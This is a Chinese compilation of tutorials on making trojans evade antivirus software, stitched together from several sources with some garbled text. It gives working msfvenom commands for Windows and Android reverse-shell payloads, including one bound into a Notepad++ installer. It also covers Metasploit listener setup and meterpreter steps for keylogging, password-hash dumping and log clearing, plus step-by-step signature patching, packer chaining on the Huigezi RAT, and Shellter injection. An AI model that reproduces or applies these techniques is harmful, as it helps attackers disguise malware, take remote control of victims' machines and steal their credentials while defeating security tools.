下载文档原格式
木马免杀技术一、杀毒软件的查杀模式杀毒软件的查杀模式分三种1.文件查杀2.内存查杀3.行为查杀这三种是目前杀毒软件常用的杀毒模式。
所谓的文件查杀就是杀毒软件对磁盘中的文件进行静态扫描,一旦发现文件带有病毒库中的病毒特征代码就给予查杀。
内存查杀是杀毒软件把病毒特征代码释放到内存中,然后与内存中的文件进行比对,发现有文件中带有病毒特征代码就给予查杀。
现在最厉害的内存查杀当然是瑞星了,其他杀毒软件也有内存查杀但比不上瑞星的厉害。
行为杀毒是杀毒软件用木马运行后的一些特定的行为作为判断是否为木马的依据。
比如:啊拉QQ大盗在运行后会增加一个名为NTdhcp.exe的进程,还有彩虹桥的服务端在运行后会在注册表添加名为HKLM\SOFTWARE\Microsoft\Active Setup\InstalledComponents\{9B71D88C-C598-4935-C5D1-43AA4DB90836}\stubpath的键值。
行为杀毒的典型杀毒软件—绿鹰PC万能精灵。
二.根据杀毒软件的查杀模式总结出免杀方法主要针对文件的文件查杀和内存查杀1.文件查杀A.加壳免杀B.修改壳程序免杀C.修改文件特征代码免杀D.加花指令免杀2.内存查杀A.修改内存特征代码B.阻止杀毒软件扫描内存====================================================== ================A.加壳免杀建议你选择一些生僻壳、茾@恰⑿驴牵 蛘呒佣嘀乜牵 馍钡氖奔洳怀?可能很快被杀,不过和加密工具配合使用一些杀毒软件是很容易过的但瑞星的内存不过。
B.修改壳程序免杀主要有两种:一是通过加花指令的方法把壳伪装成其它壳或者无壳程序。
C.修改文件特征代码免杀,此方法的针对性是非常强的,就是说一般情况下你是修改的什么杀毒软件的特征代码,那么就只可以在这种杀毒软件下免杀。
以前常用的工具有CCL特征码定位器,不过现在用起来不是那么方便了,比如黑防鸽子他有多出特征代码,给新手学习定位增加了一定的难度,现在主要推荐的是MYCCL特征码定位器,个人感觉定位速度快,准确率高,尤其对那些有多处特征码的定位。
MSF制作免杀⽊马1、制作exe免杀⽊马前⾔免杀技术全称为反杀毒技术Anti-Virus简称“免杀”,它指的是⼀种能使病毒⽊马免于被杀毒软件查杀的技术。
由于免杀技术的涉猎⾯⾮常⼴,其中包含反汇编、逆向⼯程、系统漏洞等技术,内容基本上都是修改病毒、⽊马的内容改变特征码,从⽽躲避了杀毒软件的查杀。
MSF编码在 Meatsploit 框架下免杀的⽅式之⼀就是使⽤MSF编码器。
其功能是对攻击载荷⽂件进⾏重新的排列编码,改变可执⾏⽂件中的代码形状,避免被杀软认出。
MSF 编码器可以将原可执⾏程序重新编码,⽣成⼀个新的⼆进制⽂件,这个⽂件运⾏以后,MSF 编码器会将原始程序解码到内存中并执⾏。
1.1 查看编码格式在Kali终端输⼊msfvemon -l encoders列出所有可⽤编码格式。
需要注意的是并不是所有的编码⽅式都适⽤于Windows系统,建议使⽤x86/shikata_ga_nai格式1.2 制作免杀⽊马由于裸奔⽊马容易被杀毒软件查杀,因此需要将⽊马捆绑到⼀个正常的软件上,这⾥使⽤notepad为例。
裸奔⽊马1 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.11 LPORT=1234 -f exe > /root/test.exe免杀⽊马1 msfvenom -p windows/shell_reverse_tcp LHOST=10.10.20.2 LPORT=3333 -e x86/shikata_ga_nai -x npp.7.8.6.Installer.exe -i 12 -f exe -o /root/npp1.exe⽣成exe⽊马⽂件1.3 运⾏msf监听模块1 msfconsole2 use multi/handler4set payload windows/shell_reverse_tcp5set LHOST 10.10.20.26set LPORT 33337 exploit1.4运⾏⽊马程序在Kali上开启监听,在客户机上执⾏刚才⽣成的⽊马⽂件,会⾃动连接上Kali,接下来就可以对客户机进⾏远程控制1 meterpreter下的命令:2 getwd 当前⽬录3 dir 查看所有⽂件4 cat c:\123.txt 查看⽂件123.txt内容(数据是字符串传递,所以加⼀个转义字符\)5 search -f cmd.exe (搜索名为cmd.exe⽂件所在⽬录)6 upload /root/桌⾯/backldoor.exe(要上传的⽂件) -> c:\(上传到的⽬录)上传⽂件7 download c:\123txt /root 下载⽂件8 clearev 清除⽇志9 getuid 当前⽤户10 ps 查看所⽤进程11 kill 杀死某个进程12 sysinfo 系统信息1314键盘记录15 keyscan_start 开始键盘记录16 keyscan_dump 查看结果17 keyscan_stop1819屏幕截图20 screenshot2122屏幕监控23 run vnc2425获取密⽂密码26 hashdump2728 shell29获取shell,进⼊cmd2、MSF制作安卓⽊马2.1 制作apk⽊马程序1 msfvenom -p android/meterpreter/reverse_tcp LHOST=172.16.105.184 LPORT=5555 R > /root/apk.apk2.2其他步骤可以参考上述的步骤2.3 命令sysinfo更多命令请使⽤help命令查看。
教你如何将你的木马躲过杀毒软件的查杀(制作免杀木马教程)一.关于免杀的来源为了让我们的木马在各种杀毒软件的威胁下活的更久. 二.什么叫免杀和查杀可分为二类: 1.文件免杀和查杀:不运行程序用杀毒软件进行对该程序的扫描,所得结果。
2.内存的免杀和查杀:判断的方法1运行后,用杀毒软件的内存查杀功能. 2用OD载入,一.关于免杀的来源为了让我们的木马在各种杀毒软件的威胁下活的更久.二.什么叫免杀和查杀可分为二类:1.文件免杀和查杀:不运行程序用杀毒软件进行对该程序的扫描,所得结果。
2.内存的免杀和查杀:判断的方法1>运行后,用杀毒软件的内存查杀功能.2>用OD载入,用杀毒软件的内存查杀功能.三.什么叫特征码1.含意:能识别一个程序是一个病毒的一段不大于64字节的特征串.2.为了减少误报率,一般杀毒软件会提取多段特征串,这时,我们往往改一处就可达到免杀效果,当然有些杀毒软件要同时改几处才能免杀.(这些方法以后详细介绍) 3.下面用一个示意图来具体来了解一下特征码的具体概念四.特征码的定位与原理1.特征码的查找方法:文件中的特征码被我们填入的数据(比如0)替换了,那杀毒软件就不会报警,以此确定特征码的位置2.特征码定位器的工作原理:原文件中部分字节替换为0,然后生成新文件,再根据杀毒软件来检测这些文件的结果判断特征码的位置五.认识特征码定位与修改的工具L(特征码定位器)2.OOydbg (特征码的修改)3.OC用于计算从文件地址到内存地址的小工具.4.UltaEdit-32(十六进制编辑器,用于特征码的手工准确定位或修改)六.特征码修改方法特征码修改包括文件特征码修改和内存特征码修改,因为这二种特征码的修改方法是通用的。
所以就对目前流行的特征码修改方法作个总节。
方法一:直接修改特征码的十六进制法1.修改方法:把特征码所对应的十六进制改成数字差1或差不多的十六进制.2.适用范围:一定要精确定位特征码所对应的十六进制,修改后一定要测试一下能否正常使用.方法二:修改字符串大小写法1.修改方法:把特征码所对应的内容是字符串的,只要把大小字互换一下就可以了.2.适用范围:特征码所对应的内容必需是字符串,否则不能成功.方法三:等价替换法1.修改方法:把特征码所对应的汇编指令命令中替换成功能类拟的指令.2.适用范围:特征码中必需有可以替换的汇编指令.比如JN,JNE 换成JMP等. 如果和我一样对汇编不懂的可以去查查8080汇编手册.方法四:指令顺序调换法1.修改方法:把具有特征码的代码顺序互换一下.2.适用范围:具有一定的局限性,代码互换后要不能影响程序的正常执行方法五:通用跳转法1.修改方法:把特征码移到零区域(指代码的空隙处),然后一个JMP又跳回来执行.2.适用范围:没有什么条件,是通用的改法,强烈建议大家要掌握这种改法.七.木马免杀的综合修改方法文件免杀方法:1.加冷门壳2.加花指令3.改程序入口点4.改木马文件特征码的5种常用方法5.还有其它的几种免杀修改技巧内存免杀方法:修改内存特征码:方法1>直接修改特征码的十六进制法方法2>修改字符串大小写法方法3>等价替换法方法4>指令顺序调换法方法5>通用跳转法木马的免杀[学用CLL定位文件和内存特怔码]1.首先我们来看下什么叫文件特征码.一般我们可以这样认为,一个木马程序在不运行的情况下,用杀毒软件查杀,若报警为病毒,说明存在该查毒软件的文件特征码的。
序回望免杀的初始:用WinHex逐字节修改木马免杀 -> 到后来软件保护(加壳)的加入、特征码免杀技术的公开、多层加壳的发现、反调试技术、针对于PE文件格式的免杀,到如今盛行的源码免杀。
再看反病毒的历程:从文件扫描技术、到通配符扫描技术、内存特征码扫描技术、虚拟机扫描技术、主动防御、启发式病毒查杀技术、云查杀。
我们不难发现,反病毒与反-反病毒这两项处于对立面的技术慢慢的壮大,并形成了各自所拥有的领域。
我们很想让我们心爱的黑软、木马在遇到杀软时依旧装TM牛B,反-反病毒技术的重要性就可想而知了。
但,任何技术都需要一个最简单的东西引领你:C语言,从一个简单的"Hello World!"开始;而反-反病毒:我想,还是得从MyCCL来打开免杀世界的大门……这里,MyCCL陪你开始.(注:这里只谈及使用技巧,非教程)分块个数体积小于200KB的木马在最开始选择50-100之间.体积大于200KB的木马在最开始选择10-30之间.尔后由大到小缩小范围定位。
单位长度事实上单位长度是由文件大小和分块个数决定。
相反,分块个数由文件大小和单位长度决定。
单位长度决定了每次填充的区域大小。
计算公式:文件大小÷ 分块个数 == 单位长度(其它自己推)填充方式不仅限于00、20或者90,可以是任意00-FF之间的16进制数值。
相比单一的填充方式,MultiCCL的随机数值填充方式更值得借鉴。
开始位置、结束位置、分段长度开始位置决定了从特定的偏移处开始填充,默认情况下在E0处开始填充。
有时候杀软会将特征码假定在PE头,因此可以填第一个区段的偏移量,一般第一个区段为.text,起始位置为00000600。
结束位置一般情况下为文件的末尾。
分段长度从开始位置到结束位置所经过的偏移大小。
而某些情况下,若要对某个特定区段进行特征码定位。
可以在开始位置填入区段的起始位置,在结束位置填入区段的结束地址,然后进行常规的定位流程。
第二章任务2 木马免杀2.1 木马免杀概述免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻译为“反-反病毒”,我们可以翻译为“反杀毒技术”。
木马免杀可以将其看为一种能使木马避免被杀毒软件查杀的技术。
木马免杀技术的涉猎面非常广,涉及反汇编、逆向工程甚至系统漏洞的发掘等其他顶级黑客技术。
2.2 木马免杀原理(1) 杀毒原理当前杀毒软件对病毒的查杀主要有特征代码法和行为监测法两种。
特征码就是能识别一个程序是病毒的一段不大于64字节的特征串。
特征码定位法分为文件查杀和内存查杀,杀毒软件公司拿到病毒的样本以后,定义一段病毒特征码到病毒库中,然后与扫描的文件比对,如果一致则认为是病毒。
内存查杀则是载入内存后再比对。
行为检测法是新出现的一种定义病毒的方法,它利用的原理是某些特定的病毒会有某些特定的行为来做出是否为病毒的判断。
(2) 木马免杀原理免杀在某种程度上可以说是杀毒软件的对立面。
杀毒软件通过特征码查杀病毒,相应的,通过修改特征码的方法来实现木马免杀。
特征码修改方法:方法一:直接修改特征码的十六进制法●修改方法:把特征码所对应的十六进制改成数字差1或差不多的十六进制。
●适用范围:一定要精确定位特征码所对应的十六进制,修改后一定要测试一下文件能否正常使用。
方法二:修改字符串大小写法●修改方法:如果特征码所对应的内容是字符串,只要把大小字互换一下就可以了。
●适用范围:特征码所对应的内容必须是字符串,否则不能成功。
方法三:等价替换法●修改方法:把特征码所对应的汇编指令,替换成功能类似的指令。
●适用范围:特征码中必须有可以替换的汇编指令,比如JE,JNE 换成JMP等。
方法四:指令顺序调换法●修改方法:把具有特征码的代码顺序互换一下。
●适用范围:具有一定的局限性,代码互换后必须不能影响程序的正常执行。
方法五:通用跳转法●修改方法:把特征码移到零区域(指代码的空隙处)执行后,使用JMP指令无条件调回原代码处继续执行下一条指令。
木马免杀全攻略和特征码替换简而告之……1.杀毒原理通常,一个病毒防御工作者拿到一个截获或上报上来的病毒时,先是分析这个病毒文件执行后的动作,所谓“动作”,就是指病毒文件执行后会做哪些操作。
例如会生成什么新文件、怎样更改注册表、怎样注册服务、打开什么端口等等。
搞明白这些后,下一步一般会研究这个病毒的文件结构,然后找出与众不同的地方,将其定义为特征码。
而这个特征码定义的高明与否,就要看他定义的位置是否刁钻,例如他如果定义的是病毒文件更改注册表键值那部分代码的话,这显然不会太难!因为只要病毒文件更改键值,99%的情况下这个文件里一定存在被更改键值的字符串,所以找到这段字符串的位置就可以定义特征码了。
但是针对这种特征码做免杀是非常容易的,只需找到相应的位置,并更改字母的大小写即可。
而如果从文件头找出一段特征码就是非常不容易的事情了……除此之外,所定义的特征码还有一个分支,即内存特征码。
所谓内存特征码就是指木马文件运行后释放到内存时所存在的特征,它的原理大体与上面介绍的文件特征码一样。
当特征码定义出来之后,就会被提交到另外的一个部门,然后进入病毒定义库,当用户更新后,以后杀毒软件在碰到符合要求的文件时就会将其毫不忧郁的杀掉!也就是说,杀毒软件只认特征码,不认文件。
由此可见,病毒防御工作者寻找特征码的方式也不过如此,但这只是定义病毒文件特征码的工作,别的例如修复被感染文件等技术步骤和本文无关,在这也就不介绍了,有兴趣的朋友可以自己研究一下。
2.免杀分类免杀的方法有很多,无奈没见哪为朋友综合系统的介绍,也苦了小菜们求学无门,只好掏银子找“师傅”,所以我就自告奋勇站出来一次,不足之处还请各位高手多多包涵……我个人总结的免杀方法总共分两类,即主动免杀与被动免杀。
一、主动免杀1.修改字符特征:主动查找可能的特征码,包括木马文件修改注册表、生成新文件的名称与路径、注入的进程名等动作,也包括运行过程中可能出现或一定会出现的字符等文件特征。
使⽤Shellter实现简单⽊马免杀⽊马免杀Shellter是⼀个开源的免杀⼯具,利⽤动态Shellcode注⼊来实现免杀的效果,我是使⽤的shellter免杀,做的不是很好,跟⼤家分享⼀下我的实验结果。
原理:⽣成⽊马⽂件,然后将⽣成的⽊马⽂件与**shellter免杀⼯具**捆绑,然后设置监听,将捆绑后的⽂件拷贝到WinXP系统中,双击后,发现攻击成功,最后将该⽂件在腾讯哈勃分析系统上分析。
实验环境:Kali系统 ip地址为: 192.168.159.128步骤:* 在Kali⽣成⼀个hacker.exe的⽊马⽂件。
命令为:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.159.128 lport=4321 -f exe > /root/hacker.exe* 下载安装shellter免杀⼯具,切换到shellter⽂件夹下,执⾏shellter⼯具。
(注意:直接执⾏shellter⼯具会不成功,因为Kali系统不⽀持运⾏.exe⽂件,所以我们需要安装使⽤wine模拟Windows系统打开.exe⽂件。
)* 执⾏shellter⼯具之后,依次选择1. 选择A2. PE Target后⾯填写/root/hacker.exe3. 选择Y4. 选择L5. payload反弹选择1* 输⼊攻击机ip地址:192.168.159.128,端⼝为4321* 输⼊msfconsole进⼊metasploit。
* 进⼊监听模块。
命令为use exploit/multi/handler* 配置参数,设置payload反弹,设置lport,设置lhost。
* 开始监听,run。
* 把Kali⽣成的hacker.exe复制到物理机,双击,系统没有报毒。
* 返回Kali,会看到回弹了信息,攻击成功进⼊到meterpreter,可以进⾏后渗透。
制作免杀木马用工具更轻松等制作免杀木马用工具更轻松等制作免杀木马用工具更轻松Blovlg木马如果不做免杀处理,很容易被杀毒软件清除,虽然现在木马免杀的方法有很多,但几乎每种免杀方法公布后,都逃不过杀毒软件的眼睛。
今天要介绍的方法经过测试可以顺利逃过主流杀毒软件的查杀,希望可以给那些还在寻找免杀木马的朋友带来一点福音。
这里主要利用工具制作免杀木马,比较适合小菜,用到的工具有:1、Restorator.exe。
2、MaskPE 2.0最终版.exe。
3、RPolyCrypt.exe。
4、SimplePack.exe。
5、vmprotect.exe。
这些工具在网上都可以找到。
我们拿著名的灰鸽子木马做实验,配置灰鸽子大家都会了吧,我这里用的是黑防版。
配置完毕以后用Restorator.exe 打开,把HACKER部分的大写字母改成小写的,你可以多修改一些代码这样效果会更好一些,改完后保存退出,这一步骤是躲过杀毒软件的表面查杀。
打开MaskPE2.0最终版exe,点击“LoadFile”按钮,载入灰鸽子服务端后。
直接点击“Make File”按钮输入生成的文件名如1.exe。
打开SimplePackexe,托动1.exe到界面中。
选中“压缩资源”复选框,然后点击“压缩”。
用RPolyCrypt.exe直接处理1.exe,默认设置不用改,直接点击左边的按钮就可以了。
最后打开vmproteot.exe,载入1.exe点击“Next”,的界面,点“Add>”再点“Next”弹出确定框,点击“OK”。
直到最后要注意,把“Exe cute"C:\......"”这个复选框去掉,要不然的话,自己做的免杀鸽子就会在自己的机器上运行了,那样的话就惨了!经过这样的一番加工,你的免杀版灰鸽子就完成了,而且绝对可以躲过最新的杀毒软件查杀,大家可以试试。
告诫大家不要做坏事啊。
另外免杀方法公布出来就离死不远了,我这里只是抛砖引玉,希望大家多实践找到一种自己的免杀方法。
本课主要讲解:1:对免杀的一些认识!2:MYCCL工具的使用方法首先大家先关闭杀毒软件,因为你配置的木马被杀掉没办法做免杀首先我们要了解下特征码,特征码就是杀毒软件内病毒库里面的特征有类似或者相同的特征被杀毒发现就会查杀我们今天的第一课就先学习表面特征码定位我们用到的工具是MYCCL打开工具后我们点击文件之后加载进去你生成的无壳的木马当然壳上壳也是可以的但不适合新手加载木马后会出现这样的页面好了这里已经加载好了木马这里教大家做的是表面的特征码定位所以分块数量不要大于100开始位置设定400这样不容易出现死循环,这也是一点点经验当然也要看是什么木马通常的远控木马表面特征码这样做是没问题的详细设置如下图这样就设置好了MYCCL我们就可以进行下一步了我们设置好这里之后直接点击生成成功后桌面会多出来一个文件夹那么我们点击生成如下图这之后桌面会出现一个文件夹之后用杀毒对这个文件夹进行杀毒杀毒后把查杀出来的病毒全部删除删除后关闭杀毒我们继续下一步删除所有病毒文件后我们关闭杀毒之后再点击MYCCL上面的二次处理效果如下图大家可以看下,这里已经出现了一处特征码那么接下来需要做的就是反复的去二次处理—杀毒—二次处理—杀毒这个时间是比较长的我就不单个截图了,什么时候停止呢就是一直到查杀不出病毒为止直到查杀不出病毒我们再停止进行下一步我这里已经查杀好了等查杀出没有病毒的时候我们再点击一次二次处理就会出现这样的特征码如下图大家看下这里的特征码它的单位长度是比较大的,我们没法修改所以我们需要再处理一下所以我们要点击特征区间如下图那么我们接下来就要复合定位在第一处特征码上面点击左键选择之后点击右键如图之后大家再看图分块数量我们还改成100这里开始位置就不需要再改动了之后我们点击生成之后我们再继续反复之前的这种操作杀毒,接着二次处理,直到发现不了病毒为止大家在重复二次处理的时候要注意如果分块数量大于100 我们就改成100如果不大于100 它是多少我们就不用管了我们就直接点生成就可以了好了我这里已经杀不出病毒了特征码如图第一处的特征码大家可以看下是:00000002之后我们在00000002 特征码上面再点击右键复合定位之后大家看下这里如图那么我们就要把单位长度改为1之后他的分块数量自动分为2之后我们再点击生成生成后我们再查杀单位长度特征码为1的时候是最精确的现在第一处特征码已经出现了这时候我们再查杀就不会有毒了查杀无毒后我们再次点击二次处理之后我们第一处的特征码已经查到了如图:之后我们就需要去复合定位第二处特征码和之前的复合定位一样的我就不一一给大家写出来了直到所有特征全部为00000001 或者00000002都是可以的这里如果再大我们就需要接着复合定位单位长度还是要改成1直到特征码为00000001 或00000002 都是可以的这节课就讲到这里下节课再见。
